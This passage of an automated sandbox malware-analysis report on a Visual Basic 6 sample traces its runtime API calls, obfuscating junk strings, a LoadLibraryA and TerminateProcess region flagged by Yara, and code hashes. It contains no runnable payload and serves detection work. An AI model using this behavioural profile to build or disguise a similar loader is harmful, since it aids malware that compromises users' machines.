                                                                                                                                                      • #527.MSVBVM60(Whigling), ref: 0041C6B5
                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041C6C6
                                                                                                                                                      • __vbaStrCmp.MSVBVM60(Unpitying,00000000), ref: 0041C6CE
                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 0041C6E1
                                                                                                                                                      • __vbaVarDup.MSVBVM60 ref: 0041C713
                                                                                                                                                      • #513.MSVBVM60(?,?,00000099), ref: 0041C722
                                                                                                                                                      • #717.MSVBVM60(?,?,00000080,00000000), ref: 0041C737
                                                                                                                                                      • __vbaVar2Vec.MSVBVM60(?,?), ref: 0041C748
                                                                                                                                                      • __vbaAryMove.MSVBVM60(?,?), ref: 0041C759
                                                                                                                                                      • __vbaFreeVarList.MSVBVM60(00000003,?,?,?), ref: 0041C76D
                                                                                                                                                      • __vbaVarDup.MSVBVM60 ref: 0041C793
                                                                                                                                                      • #520.MSVBVM60(?,?), ref: 0041C79D
                                                                                                                                                      • __vbaStrVarMove.MSVBVM60(?), ref: 0041C7A7
                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041C7B2
                                                                                                                                                      • __vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 0041C7BE
                                                                                                                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,00401228,00402D30,000006F8), ref: 0041C7E0
                                                                                                                                                      • #564.MSVBVM60(?,?), ref: 0041C80A
                                                                                                                                                      • __vbaHresultCheck.MSVBVM60(00000000), ref: 0041C815
                                                                                                                                                      • __vbaI4Var.MSVBVM60(?), ref: 0041C829
                                                                                                                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,00401228,00402D30,000006FC), ref: 0041C868
                                                                                                                                                      • __vbaFreeVarList.MSVBVM60(00000002,00000005,?), ref: 0041C878
                                                                                                                                                      • #574.MSVBVM60(00000005), ref: 0041C893
                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041C89E
                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 0041C8A8
                                                                                                                                                      • __vbaStrMove.MSVBVM60(Kaleches4,?,UNFREEZABLE,000043EE), ref: 0041C8D2
                                                                                                                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,00401228,00402D30,00000700), ref: 0041C8EC
                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000003,?,?,00000000), ref: 0041C900
                                                                                                                                                      • __vbaFreeVar.MSVBVM60 ref: 0041C90C
                                                                                                                                                      • __vbaVarDup.MSVBVM60 ref: 0041C935
                                                                                                                                                      • #617.MSVBVM60(?,00000003,00000092), ref: 0041C944
                                                                                                                                                      • __vbaVarDup.MSVBVM60 ref: 0041C967
                                                                                                                                                      • #524.MSVBVM60(?,?), ref: 0041C971
                                                                                                                                                      • #696.MSVBVM60(Erikka3), ref: 0041C97C
                                                                                                                                                      • __vbaStrVarMove.MSVBVM60(?), ref: 0041C996
                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041C9A1
                                                                                                                                                      • __vbaStrVarVal.MSVBVM60(?,?,?,00006066,?,?), ref: 0041C9D0
                                                                                                                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,00401228,00402D30,00000704), ref: 0041C9FA
                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0041CA10
                                                                                                                                                      • __vbaFreeVarList.MSVBVM60(00000004,00000003,?,?,?), ref: 0041CA24
                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 0041CA3E
                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 0041CA4C
                                                                                                                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,00401228,00402D30,00000708), ref: 0041CA78
                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0041CA88
                                                                                                                                                      • #572.MSVBVM60(00000003), ref: 0041CA9F
                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041CAAA
                                                                                                                                                      • #696.MSVBVM60(00000000), ref: 0041CAB3
                                                                                                                                                      • #704.MSVBVM60(?,000000FF,000000FE,000000FE,000000FE), ref: 0041CAD5
                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041CAE0
                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041CAEF
                                                                                                                                                      • #696.MSVBVM60(DESCARTES), ref: 0041CB08
                                                                                                                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,00401228,00402D30,0000070C), ref: 0041CB44
                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000003,?,?,00000000), ref: 0041CB5E
                                                                                                                                                      • __vbaFreeVarList.MSVBVM60(00000002,00000002,00000003), ref: 0041CB6A
                                                                                                                                                      • #692.MSVBVM60(00000002,taxachauffrens,diaphanous), ref: 0041CB81
                                                                                                                                                      • __vbaStrVarMove.MSVBVM60(00000002), ref: 0041CB95
                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041CBA0
                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 0041CBBE
                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0041CBF9
                                                                                                                                                      • __vbaFreeVar.MSVBVM60 ref: 0041CC01
                                                                                                                                                      • __vbaLenBstrB.MSVBVM60(Deklareret9,?), ref: 0041CC2F
                                                                                                                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,00401228,00402D30,00000710), ref: 0041CC6A
                                                                                                                                                      • #581.MSVBVM60(ALLEGATE), ref: 0041CC75
                                                                                                                                                      • __vbaFpI4.MSVBVM60(0037189C), ref: 0041CCA4
                                                                                                                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,00401228,00402D30,00000714), ref: 0041CCCF
                                                                                                                                                      • #714.MSVBVM60(00000003,00000002,00000000), ref: 0041CCF1
                                                                                                                                                      • #648.MSVBVM60(?), ref: 0041CD09
                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 0041CD23
                                                                                                                                                      • __vbaLenBstrB.MSVBVM60(Lubriciousness6), ref: 0041CD2E
                                                                                                                                                      • __vbaI4Var.MSVBVM60(00000003,?,0000349B,00001C15), ref: 0041CD4E
                                                                                                                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,00401228,00402D30,00000718), ref: 0041CD7D
                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 0041CD82
                                                                                                                                                      • __vbaFreeVarList.MSVBVM60(00000003,00000004,0000000A,00000003), ref: 0041CD96
                                                                                                                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,00401228,00402D30,0000071C), ref: 0041CDBF
                                                                                                                                                      • __vbaAryDestruct.MSVBVM60(00000000,?,0041CE54), ref: 0041CE44
                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 0041CE4D
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.25495658109.000000000041C000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.25495499681.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000001.00000002.25495522443.0000000000401000.00000020.00020000.sdmp
                                                                                                                                                      • Associated: 00000001.00000002.25495704302.0000000000421000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000001.00000002.25495730315.0000000000423000.00000002.00020000.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_BL_CI_PL.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: __vba$Free$Move$CheckHresultList$Copy$#696$Bstr$#513#520#524#527#564#572#574#581#617#648#692#704#714#717DestructVar2
                                                                                                                                                      • String ID: -W$ALLEGATE$BENTJERS$DESCARTES$Deklareret9$Erikka3$Jeepers$Kaleches4$Lubriciousness6$NONCOME$Nightwalker8$Oprettelsesdokument$PRINTERNE$Quininise$TIDSSKRIFTSAMLINGEN$UNFREEZABLE$Unbrilliantly8$Unpitying$Whigling$basilian$diaphanous$emmik$f`$hajjs$halvtidsstillingens$napaea$taxachauffrens$~frK
                                                                                                                                                      • API String ID: 444667331-2328328339
                                                                                                                                                      • Opcode ID: 1d3c5c00303d28c848d67d71f0904335bdc985bb608c71b27c401fb671b5cf8b
                                                                                                                                                      • Instruction ID: 434935850d97dffaefdd917fc2412d8309072782fcf7341b7752f2bb129f091b
                                                                                                                                                      • Opcode Fuzzy Hash: 1d3c5c00303d28c848d67d71f0904335bdc985bb608c71b27c401fb671b5cf8b
                                                                                                                                                      • Instruction Fuzzy Hash: 60324E71900218AFDB14DFA0DD88FEEBBB9FF48301F00856AE649B6190DB745A49CF65
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      APIs
                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 0041D8A5
                                                                                                                                                      • __vbaVarDup.MSVBVM60 ref: 0041D8C8
                                                                                                                                                      • #547.MSVBVM60(?,?), ref: 0041D8D6
                                                                                                                                                      • __vbaVarTstGt.MSVBVM60(?,?), ref: 0041D8FB
                                                                                                                                                      • __vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 0041D913
                                                                                                                                                      • #537.MSVBVM60(000000A3), ref: 0041D926
                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041D937
                                                                                                                                                      • #525.MSVBVM60(00000027), ref: 0041D93B
                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041D946
                                                                                                                                                      • #689.MSVBVM60(Silkwoman8,Delen1,Reduktionsventilernes), ref: 0041D989
                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041D994
                                                                                                                                                      • __vbaStrMove.MSVBVM60(00000001,000000FF,00000000), ref: 0041D9B0
                                                                                                                                                      • __vbaStrMove.MSVBVM60(Socialdemokratis,00000000), ref: 0041D9C1
                                                                                                                                                      • #712.MSVBVM60(00000000), ref: 0041D9C4
                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041D9CF
                                                                                                                                                      • #717.MSVBVM60(?,?,00000080,00000000), ref: 0041D9EF
                                                                                                                                                      • __vbaVar2Vec.MSVBVM60(?,?), ref: 0041DA00
                                                                                                                                                      • __vbaAryMove.MSVBVM60(?,?), ref: 0041DA11
                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,?), ref: 0041DA2D
                                                                                                                                                      • __vbaFreeVarList.MSVBVM60(00000002,00000008,?), ref: 0041DA3D
                                                                                                                                                      • #583.MSVBVM60(93200000,4202A390), ref: 0041DA54
                                                                                                                                                      • __vbaFpR8.MSVBVM60 ref: 0041DA5A
                                                                                                                                                      • #717.MSVBVM60(?,00000008,00000040,00000000), ref: 0041DA92
                                                                                                                                                      • __vbaStrVarMove.MSVBVM60(?), ref: 0041DA9C
                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041DAA7
                                                                                                                                                      • __vbaFreeVar.MSVBVM60 ref: 0041DAAC
                                                                                                                                                      • #572.MSVBVM60(?), ref: 0041DAC4
                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041DACF
                                                                                                                                                      • #629.MSVBVM60(?,?,0000002B,?), ref: 0041DB00
                                                                                                                                                      • __vbaStrVarMove.MSVBVM60(?), ref: 0041DB0D
                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041DB18
                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 0041DB1D
                                                                                                                                                      • __vbaFreeVarList.MSVBVM60(00000004,00000002,00000008,00000002,?), ref: 0041DB38
                                                                                                                                                      • __vbaR8IntI4.MSVBVM60 ref: 0041DB43
                                                                                                                                                      • __vbaAryDestruct.MSVBVM60(00000000,?,0041DBCF), ref: 0041DBAB
                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 0041DBB6
                                                                                                                                                      • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 0041DBBD
                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 0041DBC2
                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 0041DBC7
                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 0041DBCC
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.25495658109.000000000041C000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.25495499681.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000001.00000002.25495522443.0000000000401000.00000020.00020000.sdmp
                                                                                                                                                      • Associated: 00000001.00000002.25495704302.0000000000421000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000001.00000002.25495730315.0000000000423000.00000002.00020000.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_BL_CI_PL.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: __vba$Move$Free$List$#717Destruct$#525#537#547#572#583#629#689#712CopyVar2
                                                                                                                                                      • String ID: 17:17:17$Delen1$Reduktionsventilernes$Silkwoman8$Socialdemokratis$h
                                                                                                                                                      • API String ID: 329208838-924080792
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      control_flow_graph 90 2b3f7b6-2b3f7e9 91 2b3f7ef-2b3f880 90->91 92 2b3146e-2b314d9 call 2b31204 90->92 96 2b3f882-2b3f8ae call 2b401bf call 2b3f91f 91->96 97 2b3f8ba-2b3f919 LoadLibraryA call 2b3f91f 91->97 92->90 107 2b43d15-2b43d1c 96->107 108 2b3f8b4-2b3f8b5 96->108 109 2b43d1d-2b43d58 107->109 108->97 109->109 110 2b43d5a-2b43d5f 109->110
                                                                                                                                                      APIs
                                                                                                                                                      • LoadLibraryA.KERNELBASE(1B54ED57), ref: 02B3F8BC
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.25496832496.0000000002B30000.00000040.00000001.sdmp, Offset: 02B30000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_2b30000_BL_CI_PL.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: LibraryLoad
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1029625771-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      control_flow_graph 111 2b3f1c0-2b3f270 113 2b3f7b6-2b3f7e9 111->113 114 2b3f276-2b3f284 111->114 115 2b3f7ef-2b3f880 113->115 116 2b3146e-2b314d9 call 2b31204 113->116 114->113 121 2b3f882-2b3f8ae call 2b401bf call 2b3f91f 115->121 122 2b3f8ba-2b3f919 LoadLibraryA call 2b3f91f 115->122 116->113 132 2b43d15-2b43d1c 121->132 133 2b3f8b4-2b3f8b5 121->133 134 2b43d1d-2b43d58 132->134 133->122 134->134 135 2b43d5a-2b43d5f 134->135
                                                                                                                                                      APIs
                                                                                                                                                      • LoadLibraryA.KERNELBASE(1B54ED57), ref: 02B3F8BC
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.25496832496.0000000002B30000.00000040.00000001.sdmp, Offset: 02B30000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_2b30000_BL_CI_PL.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: LibraryLoad
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1029625771-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      control_flow_graph 136 2b33c3f-2b3c3f9 TerminateProcess
                                                                                                                                                      APIs
                                                                                                                                                      • TerminateProcess.KERNELBASE(-2F895780,F9BA47BC,C5C0FA4A,?,00000026), ref: 02B3C3EA
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.25496832496.0000000002B30000.00000040.00000001.sdmp, Offset: 02B30000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_2b30000_BL_CI_PL.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ProcessTerminate
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 560597551-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      control_flow_graph 142 4016a4-4016c0 #100
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.25495522443.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.25495499681.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000001.00000002.25495658109.000000000041C000.00000020.00020000.sdmp
                                                                                                                                                      • Associated: 00000001.00000002.25495704302.0000000000421000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000001.00000002.25495730315.0000000000423000.00000002.00020000.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_BL_CI_PL.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: #100
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1341478452-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Non-executed Functions

                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.25496832496.0000000002B30000.00000040.00000001.sdmp, Offset: 02B30000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_2b30000_BL_CI_PL.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: S$rQs
                                                                                                                                                      • API String ID: 0-2746945112
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.25496832496.0000000002B30000.00000040.00000001.sdmp, Offset: 02B30000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_2b30000_BL_CI_PL.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 812c45a778884eff900b41ef01df1354608706fd9d03eed53e6fd652f66c2699
                                                                                                                                                      • Instruction ID: 81b441c1601e1dd88d108a5a040f3f09a91338d02b02817eaa987e55ea0eee14
                                                                                                                                                      • Opcode Fuzzy Hash: 812c45a778884eff900b41ef01df1354608706fd9d03eed53e6fd652f66c2699
                                                                                                                                                      • Instruction Fuzzy Hash: 79814D759083868BDF35DF388DA83DA7BA1EF52350F5582AECC9A4F289D7344182C716
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.25496832496.0000000002B30000.00000040.00000001.sdmp, Offset: 02B30000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_2b30000_BL_CI_PL.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: ab2ba23bc754776db7188cbabbd77faaa50f4e762f4e9083508c7166c2d4eadd
                                                                                                                                                      • Instruction ID: 0792a2c6e3023df0ce7f8ee532a2b0e1abafbdf90b795d5c27bceaaddcb0484e
                                                                                                                                                      • Opcode Fuzzy Hash: ab2ba23bc754776db7188cbabbd77faaa50f4e762f4e9083508c7166c2d4eadd
                                                                                                                                                      • Instruction Fuzzy Hash: 66112534A04785CFCF38EE18C894BEA33A1BF55314F404AAADD499B250CB709A80DF51
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.25496832496.0000000002B30000.00000040.00000001.sdmp, Offset: 02B30000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_2b30000_BL_CI_PL.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: af37dfe216eef99b94b4ec7fbfb52f42e2d66fc3ecbaf83107faef61ad311ce7
                                                                                                                                                      • Instruction ID: 86cf10df26703fcde45826b39da93012633eb2a11d92079e907d341a1c4086ad
                                                                                                                                                      • Opcode Fuzzy Hash: af37dfe216eef99b94b4ec7fbfb52f42e2d66fc3ecbaf83107faef61ad311ce7
                                                                                                                                                      • Instruction Fuzzy Hash: CDC092B23826818FFB41DF18D692B4073B0FF21AD8B080494E482CFA12C324E910CA00
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.25496832496.0000000002B30000.00000040.00000001.sdmp, Offset: 02B30000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_2b30000_BL_CI_PL.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 9553b201f40634b3f0bfaa8b0557a5c34869809b08848db32634946b51e74d60
                                                                                                                                                      • Instruction ID: f1647c15dfe5582e2114d8b48c9dc7a79c4e1b76aa7bcc19d5d00c5bce2ac4c7
                                                                                                                                                      • Opcode Fuzzy Hash: 9553b201f40634b3f0bfaa8b0557a5c34869809b08848db32634946b51e74d60
                                                                                                                                                      • Instruction Fuzzy Hash:
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.25496832496.0000000002B30000.00000040.00000001.sdmp, Offset: 02B30000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_2b30000_BL_CI_PL.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: ab2d7faec90206d04624137dcf391b9a6c0b9a6dad95826754e4c5e29fff86cb
                                                                                                                                                      • Instruction ID: bebcbd0f18a999ce64e2d619b59837d29f74db5f3d96bd371bc818b82041d4c7
                                                                                                                                                      • Opcode Fuzzy Hash: ab2d7faec90206d04624137dcf391b9a6c0b9a6dad95826754e4c5e29fff86cb
                                                                                                                                                      • Instruction Fuzzy Hash: F9B00179662A80CFCE96CF09C290E40B3B4FB48B50F4258D0E8118BB22C268E900CA10
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      APIs
                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 0041DDE8
                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 0041DDF0
                                                                                                                                                      • #538.MSVBVM60(?,0000087E,00000002,00000001), ref: 0041DDFF
                                                                                                                                                      • __vbaVarTstEq.MSVBVM60(?,?), ref: 0041DE21
                                                                                                                                                      • __vbaFreeVar.MSVBVM60 ref: 0041DE2C
                                                                                                                                                      • #612.MSVBVM60(?), ref: 0041DE3B
                                                                                                                                                      • __vbaStrVarMove.MSVBVM60(?), ref: 0041DE45
                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041DE56
                                                                                                                                                      • __vbaFreeVar.MSVBVM60 ref: 0041DE5B
                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 0041DE82
                                                                                                                                                      • #618.MSVBVM60(?,0000002D), ref: 0041DE8E
                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041DE99
                                                                                                                                                      • __vbaStrCmp.MSVBVM60(Leona,00000000), ref: 0041DEA1
                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 0041DEB3
                                                                                                                                                      • #512.MSVBVM60(sphagnumets,00000032), ref: 0041DEC9
                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041DED4
                                                                                                                                                      • __vbaNew2.MSVBVM60(004033AC,0042146C), ref: 0041DEE8
                                                                                                                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,02BEEA7C,0040339C,00000014), ref: 0041DF0D
                                                                                                                                                      • __vbaStrMove.MSVBVM60(00000001), ref: 0041DF29
                                                                                                                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,004033E4,00000138), ref: 0041DF4D
                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0041DF5D
                                                                                                                                                      • __vbaFreeObj.MSVBVM60 ref: 0041DF69
                                                                                                                                                      • #702.MSVBVM60(?,000000FF,000000FE,000000FE,000000FE), ref: 0041DF89
                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041DF94
                                                                                                                                                      • __vbaFreeVar.MSVBVM60 ref: 0041DF99
                                                                                                                                                      • #610.MSVBVM60(?), ref: 0041DFA3
                                                                                                                                                      • #553.MSVBVM60(?,?), ref: 0041DFB1
                                                                                                                                                      • #696.MSVBVM60(Anslagskraftens), ref: 0041DFBC
                                                                                                                                                      • __vbaVarTstLt.MSVBVM60(00008002,?), ref: 0041DFDB
                                                                                                                                                      • __vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 0041DFED
                                                                                                                                                      • #539.MSVBVM60(?,0000008C,000000EA,00000005), ref: 0041E00F
                                                                                                                                                      • __vbaStrVarMove.MSVBVM60(?), ref: 0041E01F
                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041E026
                                                                                                                                                      • __vbaFreeVar.MSVBVM60 ref: 0041E02B
                                                                                                                                                      • #669.MSVBVM60 ref: 0041E031
                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041E03C
                                                                                                                                                      • #629.MSVBVM60(?,?,00000005,?), ref: 0041E06A
                                                                                                                                                      • __vbaStrVarMove.MSVBVM60(?), ref: 0041E074
                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041E07B
                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 0041E080
                                                                                                                                                      • __vbaFreeVarList.MSVBVM60(00000003,00000008,00000002,?), ref: 0041E094
                                                                                                                                                      • __vbaLenBstr.MSVBVM60(SIDESTILLER), ref: 0041E0A2
                                                                                                                                                      • __vbaFreeStr.MSVBVM60(0041E110), ref: 0041E0EF
                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 0041E0F4
                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 0041E0F9
                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 0041E0FE
                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 0041E103
                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 0041E108
                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 0041E10D
                                                                                                                                                      • __vbaErrorOverflow.MSVBVM60 ref: 0041E137
                                                                                                                                                      • __vbaVarDup.MSVBVM60(-00000001,00000000,6FA0D8B1), ref: 0041E1AE
                                                                                                                                                      • #632.MSVBVM60(?,?,000000E6,00000002), ref: 0041E1C5
                                                                                                                                                      • __vbaVarTstEq.MSVBVM60(?,?), ref: 0041E1EA
                                                                                                                                                      • __vbaFreeVarList.MSVBVM60(00000003,?,00000002,?), ref: 0041E206
                                                                                                                                                      • #536.MSVBVM60(?), ref: 0041E226
                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041E237
                                                                                                                                                      • __vbaFreeVar.MSVBVM60 ref: 0041E23C
                                                                                                                                                      • __vbaLenBstrB.MSVBVM60(Operationalise), ref: 0041E255
                                                                                                                                                      • #574.MSVBVM60(00000003,0000000A,000000FF,00000000), ref: 0041E270
                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041E27B
                                                                                                                                                      • #711.MSVBVM60(?,00000000), ref: 0041E282
                                                                                                                                                      • __vbaAryVar.MSVBVM60(00002008,?), ref: 0041E291
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.25495658109.000000000041C000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.25495499681.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000001.00000002.25495522443.0000000000401000.00000020.00020000.sdmp
                                                                                                                                                      • Associated: 00000001.00000002.25495704302.0000000000421000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000001.00000002.25495730315.0000000000423000.00000002.00020000.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_BL_CI_PL.jbxd
